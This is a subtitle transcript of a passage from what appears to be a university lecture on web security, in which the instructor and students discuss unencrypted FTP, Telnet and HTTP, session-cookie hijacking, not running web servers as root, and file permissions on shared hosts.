1
00:00:00,506 --> 00:00:09,546
[ Silence ]

2
00:00:10,046 --> 00:00:10,256
>> All right.

3
00:00:10,256 --> 00:00:10,806
Welcome back.

4
00:00:10,866 --> 00:00:12,696
This is Lecture Eight, Security.

5
00:00:12,906 --> 00:00:14,846
Only one lecture
to go after this.

6
00:00:14,846 --> 00:00:17,466
So summer is almost over
and tonight we start talking

7
00:00:17,466 --> 00:00:19,906
about all of the dangerous
things you might currently be

8
00:00:19,906 --> 00:00:22,706
doing in your code, specifically
in the context of PHP,

9
00:00:22,706 --> 00:00:26,296
and MySQL, as well
as in JavaScript.

10
00:00:26,296 --> 00:00:29,576
So of the topics we've discussed
thus far this semester what are

11
00:00:29,576 --> 00:00:33,046
some of the possible threats
that we've encountered,

12
00:00:33,206 --> 00:00:36,086
possible security
issues we've encountered?

13
00:00:36,966 --> 00:00:37,786
What comes to mind?

14
00:00:38,986 --> 00:00:39,336
Ben?

15
00:00:39,336 --> 00:00:43,036
>> SQL injection attacks
when typing in scripts

16
00:00:43,036 --> 00:00:44,076
as [inaudible] parameters.

17
00:00:44,076 --> 00:00:44,566
>> Okay, good.

18
00:00:44,566 --> 00:00:45,766
So SQL injection attacks

19
00:00:46,016 --> 00:00:48,206
which we'll see a
concrete example of today.

20
00:00:48,396 --> 00:00:52,086
Typing in Script, JavaScript
code into like a form

21
00:00:52,216 --> 00:00:56,766
and accidently tricking
the user into displaying

22
00:00:56,766 --> 00:00:59,136
that on some webpage or
executing that on some webpage.

23
00:00:59,136 --> 00:01:00,746
We'll see an example
of that as well.

24
00:01:01,476 --> 00:01:02,966
Other possible threats?

25
00:01:10,046 --> 00:01:11,686
Isaac is looking to
Axle for an answer.

26
00:01:12,756 --> 00:01:13,496
What do you got Axle?

27
00:01:13,936 --> 00:01:15,966
>> It's not really
a possible threat

28
00:01:15,966 --> 00:01:18,836
but if you don't encrypt your
data over HTTPS it's going

29
00:01:18,836 --> 00:01:20,076
to open for anybody to see

30
00:01:20,116 --> 00:01:22,066
and hijack your session
and all of that.

31
00:01:22,066 --> 00:01:22,586
>> Okay, good.

32
00:01:22,586 --> 00:01:25,876
So back in lecture zero we
talked a bit about HTTPS,

33
00:01:25,876 --> 00:01:28,786
or SSL, and how not using it
obviously means your traffic is

34
00:01:28,786 --> 00:01:31,766
completely unencrypted and what
the implications of that are,

35
00:01:31,766 --> 00:01:34,026
particularly for what
kind of information?

36
00:01:34,546 --> 00:01:37,996
What kind of information
is at risk

37
00:01:37,996 --> 00:01:42,076
if you're using HTTP
versus HTTPS?

38
00:01:42,266 --> 00:01:42,356
Yeah?

39
00:01:43,186 --> 00:01:53,176
>> Well your data is really
sent unencrypted so anybody

40
00:01:53,176 --> 00:01:55,286
on the same network
can see that connection

41
00:01:55,286 --> 00:01:58,396
and get all the information
that's sent.

42
00:01:58,396 --> 00:01:58,786
>> Okay, good.

43
00:01:58,786 --> 00:02:02,146
So anyone on the same
network can sniff and read any

44
00:02:02,146 --> 00:02:04,336
of the data that
you're transmitting,

45
00:02:04,336 --> 00:02:08,606
and frankly on the
entire Internet, right?

46
00:02:08,606 --> 00:02:11,366
Anyone between you,
point A, and say Amazon,

47
00:02:11,426 --> 00:02:14,106
point B. If Amazon's not using
HTTPS at all, in theory anyone

48
00:02:14,106 --> 00:02:15,776
with access with any
of the various routers

49
00:02:15,776 --> 00:02:19,026
in between point A and B
count sniff that traffic.

50
00:02:19,026 --> 00:02:19,996
So it doesn't just have

51
00:02:19,996 --> 00:02:22,256
to be wireless connectivity
nearby you.

52
00:02:22,256 --> 00:02:24,676
All right, so let's try to
flesh some of these things out

53
00:02:24,676 --> 00:02:27,266
and most of you probably
aren't familiar

54
00:02:27,486 --> 00:02:28,966
with a protocol called Telnet.

55
00:02:28,966 --> 00:02:32,006
You might be familiar with
a protocol called FTP.

56
00:02:33,036 --> 00:02:37,866
Does someone want to
pluck off one, or either,

57
00:02:38,026 --> 00:02:42,786
or both of these --
what these protocols,

58
00:02:42,786 --> 00:02:45,316
Telnet and FTP are
or are used for?

59
00:02:45,316 --> 00:02:45,776
Isaac?

60
00:02:45,776 --> 00:02:48,326
>> Well, I know FTP, like
file transcript protocol,

61
00:02:48,326 --> 00:02:53,386
means to send like files
from one computer to another.

62
00:02:53,386 --> 00:02:55,706
>> Good. So, file
transfer protocol is FTP,

63
00:02:55,926 --> 00:02:57,936
it's used to transfer
programs, files,

64
00:02:57,936 --> 00:02:59,706
anything from one
computer to another.

65
00:02:59,706 --> 00:03:01,736
There's a got-you with it,

66
00:03:01,736 --> 00:03:05,186
it's that it's completely
unencrypted,

67
00:03:05,186 --> 00:03:08,516
and yet many webhosts
support only FTP,

68
00:03:08,516 --> 00:03:13,176
or many webhosts offer FTP but
don't really warn customers

69
00:03:13,176 --> 00:03:15,836
of the potential
concerns with it.

70
00:03:16,086 --> 00:03:18,426
So what does it mean concretely

71
00:03:18,426 --> 00:03:20,736
if you're transferring
stuff via FTP?

72
00:03:20,736 --> 00:03:23,486
Right, if you have a webhosting
account, maybe it's DreamHost,

73
00:03:23,656 --> 00:03:24,836
maybe it's someone else,

74
00:03:24,986 --> 00:03:34,206
by nature of the content you're
uploading you want the whole

75
00:03:34,206 --> 00:03:37,866
world to be able to see
your GIF's, and JPEG's,

76
00:03:38,186 --> 00:03:40,136
and HTML files anyway.

77
00:03:40,136 --> 00:03:43,646
So what's the big deal if moving
the files from your computer

78
00:03:43,646 --> 00:03:46,886
or even your appliance
from this remote server is

79
00:03:46,886 --> 00:03:47,596
all unencrypted?

80
00:03:47,596 --> 00:03:47,866
Axle?

81
00:03:47,956 --> 00:03:51,166
>> Well, say that you
send more important stuff

82
00:03:51,166 --> 00:03:51,886
than just images.

83
00:03:51,886 --> 00:03:54,466
Say you send the PHP
configuration file.

84
00:03:54,766 --> 00:03:54,966
>> Good.

85
00:03:55,186 --> 00:03:57,866
>> It contains the database
name, username, password.

86
00:03:57,866 --> 00:04:01,006
And once somebody has that
they could essentially log

87
00:04:01,006 --> 00:04:03,346
into your database
and get everything.

88
00:04:03,346 --> 00:04:04,456
>> Yeah, absolutely.

89
00:04:04,456 --> 00:04:05,866
So if you're sending more

90
00:04:05,936 --> 00:04:12,136
than just publicly accessible
content like, HTML files, JPEGS,

91
00:04:12,136 --> 00:04:16,896
images and the like, but
rather you're sending things

92
00:04:17,116 --> 00:04:20,746
like your PHP code, which has
your intellectual property,

93
00:04:20,826 --> 00:04:22,266
or your configuration
files for PHP,

94
00:04:22,266 --> 00:04:24,496
which might have your database
usernames and passwords,

95
00:04:24,496 --> 00:04:25,906
and God knows what else,

96
00:04:25,906 --> 00:04:29,456
well now you're sending
this completely in the clear

97
00:04:29,456 --> 00:04:33,296
for anyone on the Internet,
or anyone in Starbucks,

98
00:04:33,296 --> 00:04:37,706
anyone between point A and
B to potentially intercept.

99
00:04:37,706 --> 00:04:40,946
And even worse than that, what
also is going in the clear

100
00:04:40,946 --> 00:04:43,846
if you're not using any kind
of encryption when you use FTP?

101
00:04:43,846 --> 00:04:44,136
Axle?

102
00:04:44,136 --> 00:04:47,486
>> I think you're
login credentials

103
00:04:47,536 --> 00:04:48,806
for the actual server.

104
00:04:49,006 --> 00:04:49,596
>> Exactly.

105
00:04:49,886 --> 00:04:52,746
Which is the absolute worse
part of the whole story.

106
00:04:53,326 --> 00:04:55,036
Which is that your username

107
00:04:55,036 --> 00:04:59,386
and your password are sent
completely in the clear,

108
00:04:59,386 --> 00:05:01,866
which means who cares if
everything else is sent

109
00:05:01,866 --> 00:05:04,446
in the clear, anyone else can
just login into the server

110
00:05:04,446 --> 00:05:08,026
after the fact and do whatever
they want with your account.

111
00:05:08,026 --> 00:05:09,826
So in short, if you
end up signing

112
00:05:09,826 --> 00:05:12,066
up for some commercial webhost,

113
00:05:12,066 --> 00:05:14,456
if you end up supporting
your own server locally,

114
00:05:14,716 --> 00:05:17,296
there is no reason today to
use FTP unless it's maybe

115
00:05:17,296 --> 00:05:19,146
on a local isolated network.

116
00:05:19,256 --> 00:05:22,016
But even then it's
just bad practice

117
00:05:22,016 --> 00:05:26,926
because you can use quite
easily an encrypted protocol,

118
00:05:26,926 --> 00:05:28,496
one of which we're about to see,

119
00:05:28,496 --> 00:05:31,296
one of which isn't mentioned
here, but it's called SFTP,

120
00:05:31,296 --> 00:05:34,076
secure file transfer protocol,
which actually has encryption.

121
00:05:34,076 --> 00:05:36,076
And these days there is
really no good reason not

122
00:05:36,076 --> 00:05:36,916
to use something like SFTP.

123
00:05:36,916 --> 00:05:38,636
So Telnet is a little
more dated,

124
00:05:38,636 --> 00:05:40,516
but it's still used
for various things.

125
00:05:40,516 --> 00:05:43,646
It's a protocol that's used
to control one computer

126
00:05:43,646 --> 00:05:45,156
from another, whereby if you
think about your terminal window

127
00:05:45,186 --> 00:05:45,846
within the CF50 appliance.

128
00:05:45,876 --> 00:05:46,926
When you open a terminal
you have a black

129
00:05:46,956 --> 00:05:47,586
and white command prompt.

130
00:05:47,616 --> 00:05:49,176
Well Telnet is a protocol that
allows you to access a black

131
00:05:49,206 --> 00:05:50,796
and white command prompt like
that but from another computer.

132
00:05:50,826 --> 00:05:52,296
So I could be sitting at home
and I could use Telnet back

133
00:05:52,326 --> 00:05:53,376
in the day to connect
to a Harvard server

134
00:05:53,406 --> 00:05:54,606
and then have a blinking
prompt on my window --

135
00:05:54,636 --> 00:05:55,476
on my screen, but that computer

136
00:05:55,506 --> 00:05:56,976
that I'm actually controlling
is somewhere else on campus.

137
00:05:57,006 --> 00:05:58,266
Or conversely, in theory
you could telnet, as a verb,

138
00:05:58,296 --> 00:05:59,496
from your own laptop to
the appliance in order

139
00:05:59,526 --> 00:06:01,086
to get a prompt, but these days
you would instead use something

140
00:06:01,116 --> 00:06:01,296
called SSH.

141
00:06:01,326 --> 00:06:02,826
Indeed the appliance does not
have Telnet support enabled,

142
00:06:02,856 --> 00:06:04,146
you cannot connect to it
insecurely via Telnet,

143
00:06:04,176 --> 00:06:05,466
rather you have to use SSH,
which encrypts the traffic.

144
00:06:05,496 --> 00:06:07,026
Even if you're just trying to
connect from your Mac or PC

145
00:06:07,056 --> 00:06:08,526
to the appliance in order to
pull up that terminal window.

146
00:06:08,556 --> 00:06:10,026
And though I keep describing
it as a black and white window,

147
00:06:10,056 --> 00:06:11,616
of course some of you might have
noticed that it supports color

148
00:06:11,646 --> 00:06:12,456
in theory with various programs,

149
00:06:12,486 --> 00:06:13,776
but it's still a command
line interface ultimately.

150
00:06:13,806 --> 00:06:14,946
So, HTTP, this one we've
definitely talked about.

151
00:06:14,976 --> 00:06:16,056
What kinds of things
are sent in the clear

152
00:06:16,086 --> 00:06:17,136
when you're using just
HTTP and not HTTPS?

153
00:06:17,166 --> 00:06:17,976
What kind of stuff is at risk?

154
00:06:23,116 --> 00:06:23,996
How about Jack?

155
00:06:23,996 --> 00:06:28,316
You have the look of
an answer on your face.

156
00:06:28,316 --> 00:06:29,546
>> [Inaudible] together here.

157
00:06:30,276 --> 00:06:35,136
Put me on the spot here.

158
00:06:35,506 --> 00:06:37,006
>> I know, I have time.

159
00:06:37,036 --> 00:06:37,496
It's okay.

160
00:06:38,936 --> 00:06:41,496
Come on. We can do it.

161
00:06:41,496 --> 00:06:44,046
HTTP, you have -- it's
completely sent in the clear.

162
00:06:44,206 --> 00:06:45,246
It's used by a lot of websites.

163
00:06:45,246 --> 00:06:47,596
So what kind of stuff
might be sent in the clear?

164
00:06:47,596 --> 00:06:48,086
[ Inaudible Speaker ]

165
00:06:48,086 --> 00:06:50,446
Okay. Session, what's
a session though?

166
00:06:50,596 --> 00:06:53,976
>> The very same file
that is on your computer

167
00:06:53,976 --> 00:06:56,516
that tells a website
or a webhost

168
00:06:56,746 --> 00:06:59,236
that you are the one
currently logged into them.

169
00:06:59,346 --> 00:06:59,656
>> Okay.

170
00:06:59,656 --> 00:07:03,076
>> And someone can steal
your session and then go

171
00:07:03,076 --> 00:07:05,086
and pretty much login
as if they were you.

172
00:07:05,236 --> 00:07:05,756
>> Okay, good.

173
00:07:05,756 --> 00:07:08,106
So recall that we discussed this
sort of higher level concept

174
00:07:08,106 --> 00:07:10,606
of a session that's
incarnated in PHP

175
00:07:10,606 --> 00:07:13,186
with the superglobal
called $_SESSION

176
00:07:13,516 --> 00:07:16,596
that it gives you the illusion
of having really a sort

177
00:07:16,596 --> 00:07:21,146
of persistent connection to some
user even though they might be

178
00:07:21,146 --> 00:07:23,186
visiting you with a
browser every few seconds

179
00:07:23,186 --> 00:07:24,006
or every few minutes.

180
00:07:24,066 --> 00:07:25,606
Nonetheless, you're
still provided

181
00:07:25,606 --> 00:07:28,436
with the storage even though
HTTP itself is stateless.

182
00:07:28,516 --> 00:07:31,226
Now you're not technically
transferring the session back

183
00:07:31,226 --> 00:07:33,626
and forth across the
Internet via HTTP.

184
00:07:34,016 --> 00:07:35,476
What are you actually
transferring

185
00:07:35,476 --> 00:07:39,746
across the Internet via HTTP
that enables sessions to exist?

186
00:07:40,276 --> 00:07:43,366
>> It's some sort of session ID
which is a really long stream

187
00:07:43,366 --> 00:07:46,246
of letters and numbers
you can't really guess.

188
00:07:47,056 --> 00:07:47,386
>> Perfect.

189
00:07:47,386 --> 00:07:49,346
So it's a really long
sequence of letters and numbers

190
00:07:49,346 --> 00:07:51,136
and this is specifically
an example of what?

191
00:07:51,756 --> 00:07:59,346
The session idea is implemented
with what feature of HTTP?

192
00:07:59,516 --> 00:08:03,746
Or how -- where is this sent?

193
00:08:03,816 --> 00:08:04,826
Let's see, someone else?

194
00:08:06,296 --> 00:08:07,856
So like I've totally -- I agree

195
00:08:07,856 --> 00:08:11,066
that HTTP involves sending
this unique identifier

196
00:08:11,066 --> 00:08:14,056
that somehow implements
sessions but how?

197
00:08:14,056 --> 00:08:15,726
If we opened up that
virtual envelope

198
00:08:15,726 --> 00:08:20,616
where in the contents inside
would it be -- this ID?

199
00:08:21,706 --> 00:08:23,706
Or what's it an example of?

200
00:08:25,836 --> 00:08:27,556
No one wants to make
eye contact.

201
00:08:27,556 --> 00:08:27,846
Axle?

202
00:08:27,846 --> 00:08:32,806
>> I mean sending --
it's send in the headers

203
00:08:32,946 --> 00:08:34,936
as the session cookie.

204
00:08:35,326 --> 00:08:35,846
>> Okay, good.

205
00:08:35,896 --> 00:08:38,016
So it's sent in the
headers as a session cookie,

206
00:08:38,016 --> 00:08:40,516
or just as a more general
notion of a cookie.

207
00:08:40,696 --> 00:08:43,466
Right? There's a set cookie
header that a server sends

208
00:08:43,466 --> 00:08:46,786
to a browser and the set cookie
header allows you to set a value

209
00:08:46,786 --> 00:08:49,336
for some key and in the
world of PHP that key happens

210
00:08:49,626 --> 00:08:53,206
to be called by default
PHPSESID, in all caps,

211
00:08:53,636 --> 00:08:54,876
but that's totally arbitrary.

212
00:08:55,236 --> 00:08:59,656
And the server meanwhile sets
a value for that key which is,

213
00:08:59,656 --> 00:09:02,446
as Jack says, a big random
sequence of letters and numbers,

214
00:09:02,686 --> 00:09:06,366
and then every time the browser
revisits that same website

215
00:09:06,526 --> 00:09:08,986
that it originally sent
it, the set cookie header,

216
00:09:09,306 --> 00:09:11,776
that browser is essentially
reminding the server,

217
00:09:11,956 --> 00:09:12,596
"I am this ID.

218
00:09:12,596 --> 00:09:14,186
I am this ID."

219
00:09:14,186 --> 00:09:16,816
And weeks ago we kind of likened
it to a handstamp that you get

220
00:09:16,816 --> 00:09:18,646
at a club or an amusement park.

221
00:09:18,826 --> 00:09:22,256
So that it permits you access
even after you're first time

222
00:09:22,256 --> 00:09:23,266
through that gate
so that you can kind

223
00:09:23,266 --> 00:09:24,336
of come and go as you please.

224
00:09:24,456 --> 00:09:26,916
Because that handstamp is sort
of reminding the guy at the gate

225
00:09:26,916 --> 00:09:28,406
that you have been here before

226
00:09:28,406 --> 00:09:30,276
and in this case it's
being even more specific,

227
00:09:30,276 --> 00:09:33,296
it's reminding him who you
actually are, not in terms

228
00:09:33,296 --> 00:09:36,236
of your identity but in terms
of your unique identifier.

229
00:09:36,506 --> 00:09:41,896
So HTTP is dangerous in terms
of its lack of encryption

230
00:09:41,896 --> 00:09:44,336
because the session ID, if
it's being sent back and forth

231
00:09:44,336 --> 00:09:46,926
across the wire, it doesn't
contain itself private

232
00:09:46,926 --> 00:09:50,476
information, it doesn't contain
your username, your password,

233
00:09:50,476 --> 00:09:51,496
your credit card information.

234
00:09:51,496 --> 00:09:54,386
Because again, as Jack said,
it's a big random number

235
00:09:54,796 --> 00:09:57,386
or big random sequence
of letters and numbers,

236
00:09:57,896 --> 00:10:02,106
but the catch is if you're
not encrypting it what's the

237
00:10:02,106 --> 00:10:04,876
implication if someone sniffs
it and steals it somehow

238
00:10:04,936 --> 00:10:05,976
by listening to your traffic?

239
00:10:06,206 --> 00:10:06,416
Axle?

240
00:10:06,416 --> 00:10:08,806
>> Well they can take
your session and pretend

241
00:10:12,756 --> 00:10:15,056
that their computer is
actually my computer running the

242
00:10:15,296 --> 00:10:15,976
same session.

243
00:10:15,976 --> 00:10:16,276
>> Exactly.

244
00:10:16,276 --> 00:10:20,156
>> [Inaudible] website, that
website is going to recognize

245
00:10:20,156 --> 00:10:23,446
that website and it's
going to say, "Hey,

246
00:10:23,446 --> 00:10:24,866
you're already logged in."

247
00:10:24,866 --> 00:10:28,896
It's going to log
them in and it's going

248
00:10:28,896 --> 00:10:30,966
to display the login -- the
secure side of the page.

249
00:10:30,966 --> 00:10:31,836
>> Exactly.

250
00:10:31,926 --> 00:10:33,566
Right. If all it takes
to remind a server

251
00:10:33,566 --> 00:10:35,606
who you are is presentation
of this big random sequence

252
00:10:35,606 --> 00:10:38,256
of letters and numbers and
a bad guy is able to steal

253
00:10:38,256 --> 00:10:39,726
that sequence of letters
and numbers from you,

254
00:10:39,726 --> 00:10:41,906
by just listening in on
your traffic wirelessly,

255
00:10:41,906 --> 00:10:44,806
or even poking around on your
computer, and then copying

256
00:10:44,806 --> 00:10:46,586
that big random sequence
of letters and numbers.

257
00:10:46,776 --> 00:10:49,046
And then he is smart
enough to know how

258
00:10:49,046 --> 00:10:53,526
to configure their computer to
transmit that same cookie value

259
00:10:53,526 --> 00:10:56,856
with a cookie header, well he or
she can just pretend to be you

260
00:10:56,856 --> 00:10:59,146
and the server doesn't
really know the difference.

261
00:10:59,146 --> 00:11:01,156
So we'll come back to how
we might mitigate this,

262
00:11:01,336 --> 00:11:04,906
but that's one of the key
shortcomings of just using HTTP

263
00:11:04,906 --> 00:11:06,966
for anything sensitive,
not to mention the fact

264
00:11:06,966 --> 00:11:09,256
that if you're submitting a
form that has your username,

265
00:11:09,256 --> 00:11:11,156
your password, your
credit card number,

266
00:11:11,156 --> 00:11:13,886
if the site is itself
not using HTTPS and all

267
00:11:13,886 --> 00:11:16,206
of that stuff too is
going in the clear,

268
00:11:16,206 --> 00:11:18,476
and so more private information
could indeed be taken

269
00:11:18,476 --> 00:11:19,046
in that case.

270
00:11:19,336 --> 00:11:21,816
MySQL meanwhile is similar
in spirit to the rest

271
00:11:21,816 --> 00:11:24,436
of these protocols in that
it itself is not encrypted.

272
00:11:24,626 --> 00:11:27,646
Recall we talked briefly
a couple lectures ago

273
00:11:27,876 --> 00:11:30,656
that generally you want
your MySQL server sitting

274
00:11:30,656 --> 00:11:33,336
on the same network as your
web servers, even if it's

275
00:11:33,336 --> 00:11:34,696
on a different physical machine

276
00:11:34,966 --> 00:11:37,396
so that your traffic
is only going

277
00:11:37,396 --> 00:11:39,616
over your own local
network and not connecting

278
00:11:39,616 --> 00:11:42,736
to some remote database
server elsewhere.

279
00:11:43,706 --> 00:11:45,656
So, what are some

280
00:11:45,656 --> 00:11:47,846
of the problems we did
solve though thus far?

281
00:11:47,846 --> 00:11:52,026
Well, recall there's this
feature in the appliance,

282
00:11:52,326 --> 00:11:55,726
which I think I mentioned ever
so briefly, or maybe not even,

283
00:11:55,726 --> 00:11:57,206
suPHP, substitute user PHP.

284
00:11:57,206 --> 00:11:59,676
Oh we did have this
conversation.

285
00:11:59,676 --> 00:12:03,176
Recall that one of the problems
with a web server in general is

286
00:12:03,176 --> 00:12:08,286
that if you are running that web
server as root, that's very bad,

287
00:12:08,286 --> 00:12:09,946
and thankfully it's
rarely done these days.

288
00:12:09,946 --> 00:12:13,476
Why is it bad to run a web
server, which is just a program

289
00:12:13,476 --> 00:12:14,506
that serves up webpages,

290
00:12:14,856 --> 00:12:16,966
as the administrator
account, so-called root?

291
00:12:16,966 --> 00:12:17,176
Jack?

292
00:12:17,526 --> 00:12:23,386
>> If anyone ever breaks into
the account via some PHP hack

293
00:12:23,386 --> 00:12:26,106
or something they can literally
wreck anything on the server.

294
00:12:26,106 --> 00:12:26,626
>> Exactly.

295
00:12:26,626 --> 00:12:28,066
>> [Inaudible] has root access.

296
00:12:28,246 --> 00:12:28,666
>> Perfect.

297
00:12:28,666 --> 00:12:31,496
So if the web server is running
with administrative privileges

298
00:12:31,496 --> 00:12:33,356
as the so-called root user

299
00:12:33,536 --> 00:12:37,236
and that web server is
executing buggy code, that you

300
00:12:37,236 --> 00:12:39,266
or someone else wrote,
buggy in the sense

301
00:12:39,266 --> 00:12:40,936
that there's something
stupid in there

302
00:12:41,196 --> 00:12:43,536
that lets a user
execute some command.

303
00:12:43,776 --> 00:12:47,266
The scary part here is that
who's going to be executing

304
00:12:47,266 --> 00:12:51,326
that command if a bad guy is
taking advantage of that bug

305
00:12:51,326 --> 00:12:55,476
or vulnerability in the software
is going to be executed as root.

306
00:12:55,476 --> 00:12:57,526
And root unfortunately
generally has privileges

307
00:12:57,526 --> 00:13:00,796
to delete everything, download
anything, change usernames,

308
00:13:00,796 --> 00:13:02,226
passwords, install anything.

309
00:13:02,226 --> 00:13:04,496
It's just there's
really no constraints

310
00:13:04,496 --> 00:13:05,616
on that particular user.

311
00:13:05,616 --> 00:13:08,136
So, running anything as root
is generally bad because again,

312
00:13:08,136 --> 00:13:11,216
if what root is running is
vulnerable to being taken

313
00:13:11,216 --> 00:13:12,906
over by a bad guy, or tricked

314
00:13:12,906 --> 00:13:14,946
into executing some
arbitrary command,

315
00:13:15,376 --> 00:13:17,336
well then that command's
going to be run as root and at

316
00:13:17,336 --> 00:13:19,766
that point who knows what
the bad guys has done

317
00:13:19,806 --> 00:13:21,426
to or with your system.

318
00:13:22,166 --> 00:13:23,236
Axle, question, comment?

319
00:13:24,176 --> 00:13:28,106
No? Okay. All right, so we can
fix this by running a web server

320
00:13:28,106 --> 00:13:29,476
under a different username.

321
00:13:29,866 --> 00:13:33,886
Something like Apache, or
HTTPD, or some systems run it

322
00:13:33,886 --> 00:13:35,806
as literally an account
called "Nobody."

323
00:13:36,056 --> 00:13:37,596
And in all of those
cases the user

324
00:13:37,596 --> 00:13:40,406
in question does not have
administrative privileges.

325
00:13:40,626 --> 00:13:41,926
So the worst thing
that can happen

326
00:13:41,926 --> 00:13:45,036
if you're running your web
server as Apache or as HTTPD,

327
00:13:45,036 --> 00:13:48,606
as the appliance does,
is that the only account

328
00:13:49,206 --> 00:13:50,786
that can be compromised,

329
00:13:51,066 --> 00:13:54,366
the only account whose files
can be deleted, the only account

330
00:13:54,366 --> 00:14:01,136
that can have some damage
done to it is the HTTPD user.

331
00:14:01,136 --> 00:14:03,866
Now that's not great because
that means a bad guy could take

332
00:14:03,866 --> 00:14:06,366
down your entire web
server, or delete the logs

333
00:14:06,366 --> 00:14:11,146
for the web server, or any
files that the HTTPD user owns,

334
00:14:11,466 --> 00:14:14,266
but at least that's one user you
can just remove the whole web

335
00:14:14,266 --> 00:14:16,436
server account, you can
blow away all those files

336
00:14:16,716 --> 00:14:18,186
because root hasn't
been compromised

337
00:14:18,186 --> 00:14:19,226
and you can reinstall.

338
00:14:19,436 --> 00:14:20,276
But there is a problem.

339
00:14:20,276 --> 00:14:24,996
If your files are being
read and executed by Apache,

340
00:14:25,606 --> 00:14:27,156
the web server, what do you have

341
00:14:27,156 --> 00:14:31,216
to chmod your files
to be in that case?

342
00:14:31,656 --> 00:14:35,296
If you are someone like J.
Harvard, or Axle, or Isaac,

343
00:14:35,296 --> 00:14:38,726
if you have your own user ID and
yet the web server is running

344
00:14:38,726 --> 00:14:41,516
as a different username,
like HTTPD, what do you have

345
00:14:41,516 --> 00:14:43,626
to set the permissions
on your own files

346
00:14:43,626 --> 00:14:45,206
to for this to all work?

347
00:14:45,776 --> 00:14:47,716
Previously it didn't
matter because root can read

348
00:14:47,716 --> 00:14:50,416
and write any file so it doesn't
matter what the permissions are.

349
00:14:50,996 --> 00:14:51,986
He has unfettered access.

350
00:14:53,106 --> 00:14:54,326
But HTTPD wouldn't.

351
00:14:54,546 --> 00:14:56,466
So what do you have to
chmod your files usually?

352
00:14:56,466 --> 00:14:58,746
And chmod remember is the
command for changing the mode

353
00:14:58,746 --> 00:15:03,976
of a file which means the
permission, 644, 711, 700,

354
00:15:03,976 --> 00:15:06,496
A plus R, A plus X,
whatever the case may be.

355
00:15:07,076 --> 00:15:11,116
And don't worry if you
don't remember the codes,

356
00:15:11,156 --> 00:15:14,266
but in words what kind of
permissions do your files need?

357
00:15:14,266 --> 00:15:14,406
Yeah?

358
00:15:14,526 --> 00:15:19,066
>> This is probably
not the best solution

359
00:15:19,066 --> 00:15:22,236
but you can set all plus read
on a group of all the users

360
00:15:22,306 --> 00:15:25,466
that are allowed
access, including Apache.

361
00:15:25,466 --> 00:15:26,116
>> Okay, say that once more.

362
00:15:26,246 --> 00:15:26,896
Set what to read?

363
00:15:27,226 --> 00:15:28,446
>> All plus read.

364
00:15:28,836 --> 00:15:30,016
>> Oh, okay.

365
00:15:30,016 --> 00:15:34,736
>> On the group -- on
a group, like students

366
00:15:34,886 --> 00:15:35,836
or [inaudible] on a web server.

367
00:15:35,836 --> 00:15:36,546
>> Okay, good.

368
00:15:36,776 --> 00:15:38,896
>> [Inaudible] all the accounts
that are allowed to access

369
00:15:39,026 --> 00:15:40,336
that file, including Apache.

370
00:15:40,436 --> 00:15:40,936
>> Okay, good.

371
00:15:40,936 --> 00:15:42,656
So in theory you could
put all of the users

372
00:15:42,696 --> 00:15:45,626
into a group called students
or something like that,

373
00:15:45,906 --> 00:15:47,886
and make sure that Apache
is in the same group,

374
00:15:48,196 --> 00:15:51,386
and then you can give the group
read access, and the command

375
00:15:51,386 --> 00:15:54,886
for this, recall, is not A
plus R, but would be G plus R

376
00:15:54,886 --> 00:15:58,116
in this case, chmod G plus R,
group plus readability, right,

377
00:15:58,556 --> 00:16:01,146
to whatever file or
directory is in question.

378
00:16:01,656 --> 00:16:02,786
All right, so that's not bad.

379
00:16:02,896 --> 00:16:05,706
It's a little more work and
it's a little weird I would say

380
00:16:05,706 --> 00:16:08,036
that you have all of these
students for instance or all

381
00:16:08,036 --> 00:16:10,656
of these customers in a
group and the web server

382
00:16:10,656 --> 00:16:13,306
who is not a customer or a
student in that same group.

383
00:16:13,306 --> 00:16:15,086
It's a little weird,
but possible.

384
00:16:15,266 --> 00:16:18,056
But if we don't like that
we could just do A plus R,

385
00:16:18,056 --> 00:16:20,096
all plus everybody
can read the files,

386
00:16:20,416 --> 00:16:21,916
and that seems reasonable right?

387
00:16:21,916 --> 00:16:24,296
Because if my GIF's, and
JPEG's, and HTML files are

388
00:16:24,296 --> 00:16:25,576
on the Internet they're
meant to be read.

389
00:16:25,576 --> 00:16:29,646
What's the big deal about giving
read access to all students

390
00:16:29,646 --> 00:16:31,836
or to Apache and other
accounts on the system?

391
00:16:31,836 --> 00:16:32,016
Jack?

392
00:16:32,296 --> 00:16:34,806
>> Well that means if I really
wanted to I could find a way

393
00:16:34,896 --> 00:16:39,156
to easily see your plain
text PHP without having

394
00:16:39,156 --> 00:16:41,196
to go through any hoops.

395
00:16:41,196 --> 00:16:43,946
>> So in this case if
you're on a shared webhost

396
00:16:44,306 --> 00:16:46,716
and you're a customer,
someone else is a customer,

397
00:16:46,716 --> 00:16:47,856
someone else is a customer,

398
00:16:48,116 --> 00:16:51,376
and all of you have your own
websites, which is common

399
00:16:51,476 --> 00:16:54,186
on a virtual hosting environment
like, DreamHost or the like,

400
00:16:54,696 --> 00:16:58,536
but the web server by necessity
needs you to chmod your files

401
00:16:58,536 --> 00:17:02,196
to be world readable, those
files then are going to readable

402
00:17:02,196 --> 00:17:04,066
by anyone else on the system.

403
00:17:04,066 --> 00:17:06,066
For instance, if Axle
has chmoded his files

404
00:17:06,066 --> 00:17:09,256
to be world readable just
because Apache needs them to be.

405
00:17:09,396 --> 00:17:11,696
Well if Jack if a
malicious user on the system

406
00:17:11,696 --> 00:17:14,426
and knows Axle's username he
can essentially start poking

407
00:17:14,426 --> 00:17:18,006
around his around using CD or
LS or the various Linus commands

408
00:17:18,006 --> 00:17:21,376
with which you could do this,
and see Axle's PHP files,

409
00:17:21,376 --> 00:17:23,006
inside of which might
be passwords,

410
00:17:23,006 --> 00:17:24,276
usernames, and so forth.

411
00:17:24,626 --> 00:17:25,536
So it doesn't feel ideal,

412
00:17:25,536 --> 00:17:29,266
it feels like we're giving too
much access to the world here.

413
00:17:29,266 --> 00:17:29,376
Yeah?

414
00:17:29,376 --> 00:17:31,376
>> But the PHP source
would never be distributed

415
00:17:31,456 --> 00:17:32,706
over the Internet, right?

416
00:17:34,076 --> 00:17:35,746
Because it's actually
is configured never

417
00:17:35,746 --> 00:17:40,216
to display the PHP source
unless there's an internal

418
00:17:40,216 --> 00:17:40,476
server error.

419
00:17:40,476 --> 00:17:40,716
>> Good. Correct.

420
00:17:40,716 --> 00:17:44,596
So, in this case your PHP code
is not at risk for being spit

421
00:17:44,596 --> 00:17:47,326
out on the Internet
without being interpreted.

422
00:17:47,606 --> 00:17:50,526
The threat here is that Jack
is just another paying customer

423
